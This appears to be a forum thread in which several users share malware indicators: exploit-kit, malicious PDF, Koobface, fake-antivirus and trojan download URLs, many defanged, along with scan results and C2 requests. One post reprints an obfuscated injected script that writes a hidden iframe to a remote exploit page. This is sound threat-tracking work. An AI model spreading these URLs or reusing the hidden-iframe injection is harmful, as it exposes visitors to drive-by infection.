daily something......

[Malware-Web-Threats]

redirects to exploits:

Code: [Select]

hxxp://tds4self.com/sutra/in.cgi?3Wepawet

exploits:

Code: [Select]

hxxp://webcom-software.net/links/?
hxxp://monkey-squad.net/monkey/index.php
hxxp://monkey-squad.net/monkey/spl/pdf.pdf
hxxp://bronotak.cn/phpmyadmin/index.php?
hxxp://qwu11a.biz/cpanel/spl/pdf.pdf
Wepawet
Wepawet
Wepawet
Wepawet
Wepawet

trojan:

Code: [Select]

hxxp://monkey-squad.net/monkey/exe.php
hxxp://qwu11a.biz/cpanel/exe.php
VirusTotal - 27/40 (67.5%)
VirusTotal - 11/40 (27.5%)

[CkreM]

Exploit/trojan:

Code: [Select]

carpena.co.uk/cmweb/print/pdf.phphttp://wepawet.iseclab.org/view.php?hash=7e78a387e1c5eac47bd34922f4cef85f&t=1241336475&type=js

Koobface:(goes on and off all the time)

Code: [Select]

86.108.36.203/setup.exe
99.50.245.81/setup.exehttp://www.virustotal.com/analisis/bd22d575927bfbf1103713d8718c3a90

Redirects to exploits:

Code: [Select]

freak-vkontakte.bizcontain iframe to

Code: [Select]

http://basesrv3.net/bin/in.php which is on MDL
wepawet gives Invalid hostname on this domain.
http://jsunpack.jeek.org/dec/go?url=freak-vkontakte.biz

[CkreM]

koobface:

Code: [Select]

99.149.173.147/setup.exehttp://www.virustotal.com/analisis/600848442c7fed4e8727fc0bc4ee4963

Fake AV:

Code: [Select]

way4scan.info

[CkreM]

Fake AV:

Code: [Select]

truepornmovies.com/scan/?id=259
truepornupload.com/codec.exehttp://www.virustotal.com/analisis/cf4edf2f5335aeb331a25c1267bfd36f

Koobface:

Code: [Select]

75.10.117.174/setup.exehttp://www.virustotal.com/analisis/a2b8e6c4944251f9fc6cf88c36865dd7
Trojan:

Code: [Select]

wc-zone.biz/root.exehttp://www.virustotal.com/analisis/6272b4bfc597e3de994ab200a91c0d44
Trojan:

Code: [Select]

lesbian-girlhard.com/ftp.exehttp://www.virustotal.com/analisis/4d51d8169ba9ad5d74189913c2f89c4b
Trojan Pinch:

Code: [Select]

siski-piski.biz/tarif/pin.exehttp://www.virustotal.com/analisis/ebf13bc733aff1068de51d379f3760da
Trojan:

Code: [Select]

fp3s.biz/6007.exehttp://www.virustotal.com/analisis/56081b98a809bdde7394834e262053cf
Trojan:

Code: [Select]

antivirus.vc/pictures/forum/ftp1.exehttp://www.virustotal.com/analisis/cc07134acd95c61cda816efb94778537

[SysAdMini]

Code: [Select]

http://cutheatergroup.cn/fl/index.php
http://wepawet.iseclab.org/view.php?hash=3c532cd0cfca29264a4000f6e9476f16&t=1241447080&type=js

Code: [Select]

http://cutheatergroup.cn/fl/cache/readme.pdfhttp://wepawet.iseclab.org/view.php?hash=8078638d68a0675fe56b6e14ebf5425a&t=1241447310&type=js

Code: [Select]

http://cutheatergroup.cn/fl/load.php?id=4
http://cutheatergroup.cn/fl/load.php?id=5http://www.virustotal.com/analisis/a61bd8c9f1542069d75889f4f9040adc 8/39

[Malware-Web-Threats]

Redirects to fake codec page

Code: [Select]

hxxp://rhianna.name/vidd/Wepawet
Fake codec page

Code: [Select]

hxxp://tubecollection2009.com/xxplay.php?id=40009
Trojan:

Code: [Select]

hxxp://kvm-softwares.com/softwarefortubeview.40009.exeVirusTotal - 10/40 (25%)
Anubis
ThreatExpert

downloads:

Code: [Select]

hxxp://imageempires.com/perce/064c5b7bbc854008e18e97e54448fea26776e621b10f2f35f025196defd65efd23a07ce83fb8ef114/80f/perce.jpg
hxxp://picturesoffline.com/item/86ccfb2b2c651048211e775514986e728746d681618fff45b0b539ddffb6de8d73c0aca83fc8ef51e/50a/item.gif
hxxp://pictureswall.com/werber/109/216.jpg
VirusTotal - 28/40 (70%)
Anubis
ThreatExpert

VirusTotal - 22/40 (55%)
Anubis
ThreatExpert

VirusTotal (216.jpg - bb.jpg) - 14/40 (35%)
Anubis
ThreatExpert

perce.jpg
HTTP Conversations:

216.240.157.91:80 - [imagesrepository.com]
POST /resolution.php
88.214.205.8:80 - [zone-searching.com]
POST /borders.php

item.gif
HTTP Conversations:

216.240.157.88:80 - [last-visit.com]
GET /cset.php?id=g/7bOKwqwd6bH3e9BvR2gC5DOC QMjuEVJXCr1HPwBvUhUpfkUo9FCofikcbokMC3jvn7vnlOfsSb ApC9D84VB4pDwQzKDIuNNR7WpvFBlUMPZcyrW3O9vf9lli2EaM wb5lhGwWRkdZIg74dRBmaah/YZsBERxLkPueyDpqK/ml4U4Vlw 96siO09AkAzfqTK81K4Kpw4ntiIe0J7ZDQvPKOlWVMEo9vNlcI..
GET /uget.php?id=g/7bOKwqwd6bH3e9BvR2gC5DOC QMjuEVJXCr1HPwBvUhUpfkUo9FCofikcbokMC3jvn7vnlOfsSb ApC9D84VB4pDwQzKDIuNNR7WpvFBlUMPZcyrW3O9vf9lli2EaM wb5lhGwWRkdZIg74dRBmaah/YZsBERxLkPueyDpqK/ml4U4Vlw 96siO09AkAzfqTK81K4Kpw4ntiIe0J7ZDQvPKOlWVMEo9vNlcI..

[SysAdMini]

Trojan:

Code: [Select]

hxxp://kvm-softwares.com/softwarefortubeview.40009.exeVirusTotal - 10/40 (25%)
Anubis
ThreatExpert

see also:

xxx-softwares.com
cool-softtech.com
rtfm-softweares.com
xyu-softportal.com
xepace-software.com
ce-softwares.com
dig-softportals.com
pac-softportal.com

[Malware-Web-Threats]

This IP host similar websites with same payload: http://www.robtex.com/ip/195.88.80.41.html

can be download using "/softwarefortubeview.40007.exe" - "/softwarefortubeview.40008.exe" etc..

Code: [Select]

hxxp://xxx-softwares.com/softwarefortubeview.40009.exe
hxxp://cool-softtech.com/softwarefortubeview.40009.exe
hxxp://rtfm-softweares.com/softwarefortubeview.40009.exe
hxxp://xyu-softportal.com/softwarefortubeview.40009.exe
hxxp://xepace-software.com/softwarefortubeview.40009.exe
hxxp://ce-softwares.com/softwarefortubeview.40009.exe
hxxp://dig-softportals.com/softwarefortubeview.40009.exe
hxxp://pac-softportal.com/softwarefortubeview.40009.exe


File size: 65536 bytes
MD5...: b179b7959a87bd316d7f7f11a993e037

VirusTotal

[Malware-Web-Threats]

Also have the same structure with "promo.exe"

Code: [Select]

hxxp://xxx-softwares.com/promo.exe
hxxp://cool-softtech.com/promo.exe
hxxp://rtfm-softweares.com/promo.exe
hxxp://xyu-softportal.com/promo.exe
hxxp://xepace-software.com/promo.exe
hxxp://ce-softwares.com/promo.exe
hxxp://dig-softportals.com/promo.exe
hxxp://pac-softportal.com/promo.exe


File size: 74752 bytes
MD5: 951f3ee90eb3576325fa1920e3da678c

VirusTotal - 29/39 (74.36%)
Anubis
ThreatExpert

HTTP Conversations:

216.240.148.9:80 - dfdsfdsfcdsc.com
Request: GET /bbb.php
Request: GET /ccc_2.php?uid=6cbbc5081e7548e276611ff5059df6ed30c8f8f1&aid=&os=513

[Malware-Web-Threats]

related: teyrebuf[.]cn, gukgifoc[.]cn, beelposttraning[.]ru, dastrealworld[.]ru

redirects to exploits:

Code: [Select]

hxxp://dastrealworld.ru/denunreal.html
Wepawet

the script that came with this one

<script>
document.write(unescape("%3c%73%74%79%6c%65%20%74%79%70%65%3d%22%74%65%78%74%2f%63%73%73%22%3e%20%69%66%72%61%6d%65%20%7b%77%69%64%74%68%3a%30%3b%68%65%69%67%68%74%3a%30%3b%62%6f%72%64%65%72%3a%30%3b%7d%20%3c%2f%73%74%79%6c%65%3e"));
</script>
<script>
eval(unescape("%76%61%72%20%62%32%34%20%3d%20%53%74%72%69%6e%67%2e%66%72%6f%6d%43%68%61%72%43%6f%64%65%28%31%30%34%2c%31%31%36%2c%31%31%36%2c%31%31%32%2c%35%38%2c%34%37%2c%34%37%2c%31%30%30%2c%39%37%2c%31%31%35%2c%31%31%36%2c%31%31%34%2c%31%30%31%2c%39%37%2c%31%30%38%2c%31%31%39%2c%31%31%31%2c%31%31%34%2c%31%30%38%2c%31%30%30%2c%34%36%2c%31%31%34%2c%31%31%37%2c%34%37%2c%31%30%30%2c%31%30%31%2c%31%31%30%2c%31%31%37%2c%31%31%30%2c%31%31%34%2c%31%30%31%2c%39%37%2c%31%30%38%2c%34%36%2c%31%30%34%2c%31%31%36%2c%31%30%39%2c%31%30%38%29%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%75%6e%65%73%63%61%70%65%28%27%3c%69%66%72%61%6d%65%20%73%72%63%3d%5c%27%27%2b%62%32%34%2b%27%5c%27%3e%3c%2f%69%66%72%61%6d%65%3e%27%29%29%3b"));
</script>

the iframe:

<style type="text/css"> iframe {width:0;height:0;border:0;} </style>

var b24 = String.fromCharCode(104,116,116,112,58,47,47,100,97,115,116,114,101,97,108,119,111,114,108,100,46,114,117,47,100,101,110,117,110,114,101,97,108,46,104,116,109,108);document.write(unescape('<iframe src=\''+b24+'\'></iframe>'));

Found here:
http://wepawet.iseclab.org/view.php?hash=0495bd4385abfecfa1b5085b9027777d&t=1241485592&type=js

other on the same site

Code: [Select]

hxxp://dastrealworld.ru/underworld.html
hxxp://dastrealworld.ru/cover.html
Wepawet
Wepawet

pdf exploits:

Code: [Select]

hxxp://gukgifoc.cn/nuc/spl/pdf.pdf
Wepawet

[RS-232]

hxxp://totalweightlosscenter.com/images/go.php?sid=1
hxxp://nikolaevere.com/images/data/load.php

- - - - - - - - - - -
Pharmacy crap:
http://www.robtex.com/ip/203.117.111.123.html
- - - - - - - - - - -
Hadn't seen this lame trick in quite some time...

hxxp://www.mediapartner.by.ru/bunners/banunicom.gif
http://www.virustotal.com/analisis/228b180b2318b8477201eea15d09a0bb
Result: 7/40 (17.5%)

- - - - - - - - - - -

hxxp://update.dom11z.cn/cache/readme.pdf
http://www.virustotal.com/analisis/54bcdbcb1f52dc418c5af7fd965eb75e

Interesting ip...lots of domains them seem to redirect to update.dom11z.cn above,one way or another:
http://www.bfk.de/bfk_dnslogger.html?query=213.182.197.230#result

[RS-232]

From the 213.182.197.2xx neighbourhood again...

hxxp://hostyapics.com/video/988/install_flash_player.exe
http://www.virustotal.com/analisis/72fa934c6d4d76a80a2d714d3586cc8b
Result: 4/40 (10%)
http://anubis.iseclab.org/?action=result&task_id=170666b5c144e68b4b9008d22642304c4&format=html
---->
hxxp://members.chello.pl/i.lemecha/index1.gif
http://www.virustotal.com/analisis/a9bb65e395a3f6a43ef8bec2790d9697
Result: 4/39 (10.26%)
http://anubis.iseclab.org/?action=result&task_id=1451aadd8279355c469500473ed1e00b3&format=html
--->
(Anubis results in short...i've commented only the ones that have a somewhat lousy detection rate):
hxxp://adimsceibh.com/progs/eqkxyll/cziwjnoo.php?adv=adv557
hxxp://adimsceibh.com/progs/eqkxyll/vblymjwx.php
hxxp://adimsceibh.com/progs/eqkxyll/bueesf.php
hxxp://adimsceibh.com/progs/eqkxyll/rtqrrfss.php
hxxp://adimsceibh.com/progs/eqkxyll/fczzm.php
hxxp://adimsceibh.com/progs/eqkxyll/hrnbopcqde.php
hxxp://adimsceibh.com/progs/eqkxyll/yvscpd.php // Result: 4/40 (10%) - Pinch
hxxp://adimsceibh.com/progs/eqkxyll/gqrrfft // Result: 9/41 (21.96%) - Vundo

[CkreM]

PDF exploits(all the same, on IP - 91.212.41.119):

Code: [Select]

nicdaheb.cn/nuc/spl/pdf.pdfhttp://wepawet.iseclab.org/view.php?hash=d0151c3192d10713487fff545fab19ff&t=1241590847&type=js

Code: [Select]

sehmadac.cn/nuc/spl/pdf.pdfhttp://wepawet.iseclab.org/view.php?hash=e0ee4d85cd32c9d38378686a65413636&t=1241591188&type=js

Code: [Select]

vavgurac.cn/nuc/spl/pdf.pdfhttp://wepawet.iseclab.org/view.php?hash=de5856cb0d29edcbf0151722249c73f8&t=1241591259&type=js

Code: [Select]

tixleloc.cn/nuc/spl/pdf.pdfhttp://wepawet.iseclab.org/view.php?hash=614e78b7f2bf16d7fc76ebfd876e57d5&t=1241591442&type=js

Code: [Select]

teyrebuf.cn/nuc/spl/pdf.pdfhttp://wepawet.iseclab.org/view.php?hash=371a870529fc3101c03eeee07e93124c&t=1241591523&type=js

Code: [Select]

tukhemaj.cn/nuc/spl/pdf.pdfhttp://wepawet.iseclab.org/view.php?hash=251584c0c643dcfe6ba8ec2842547b76&t=1241591544&type=js

Code: [Select]

tixwagoq.cn/nuc/spl/pdf.pdfhttp://wepawet.iseclab.org/view.php?hash=aee55ad675950b610765dc60a7772a9d&t=1241591577&type=js

all lead to this trojan:

Code: [Select]

nicdaheb.cn/nuc/exe.phphttp://www.virustotal.com/analisis/3b2a31a93f84f0b540f14abbe54a89e0

Rogue:

Code: [Select]

antivguardian.com
antiawarepro.com
antivirprof.com
Fake AV:

Code: [Select]

stats.swpstats.com/getfile?id=26http://www.virustotal.com/analisis/ed4436020c7fe8208e13d0b19cda10db

Fake AV:

Code: [Select]

free-webscaners.com/scan
Koobface:

Code: [Select]

64.4.224.45/setup.exe
69.154.143.170/setup.exe
75.54.183.125/setup.exe
62.98.53.173/setup.exe
74.216.59.250/setup.exehttp://www.virustotal.com/analisis/6914e7738d5af094ac7105a4aa087a60

Trojan:

Code: [Select]

http://down.yyduowan.net/2.exehttp://www.virustotal.com/analisis/b008ea75feb56250e0124be694180c2d
Trojan:

Code: [Select]

svarkon.ru/update.exehttp://www.virustotal.com/analisis/f8f886d3907495a15f08d982bbae11b2

[XiTri]

Code: [Select]

http://72.29.67.139/knb/megatrader-2k_20090505.exe

http://vilko.biz/opi/index.php
http://vilko.biz/opi/load.php
http://vilko.biz/opi/cache/readme.pdf

http://vilko.biz/myy/index.php
http://vilko.biz/myy/load.php
http://vilko.biz/myy/cache/readme.pdf

[CkreM]

Exploit:(downloaded file on MDL)

Code: [Select]

liteautobestguide.cn/index.phphttp://wepawet.cs.ucsb.edu/view.php?hash=66fec491755fc72f675563dd6c4fc20a&t=1241645815&type=js

Also a trojan on that domain:

Code: [Select]

liteautobestguide.cn/load.phphttp://www.virustotal.com/analisis/bfbac430fbb0fb3096239b7c98d384ac

Koobface:

Code: [Select]

65.75.82.150/setup.exe
98.203.149.224/setup.exetrojan:

Code: [Select]

qqcfwaigua.com/cfwg.exehttp://www.virustotal.com/analisis/7403d735e83451ef65863b15b832d9ae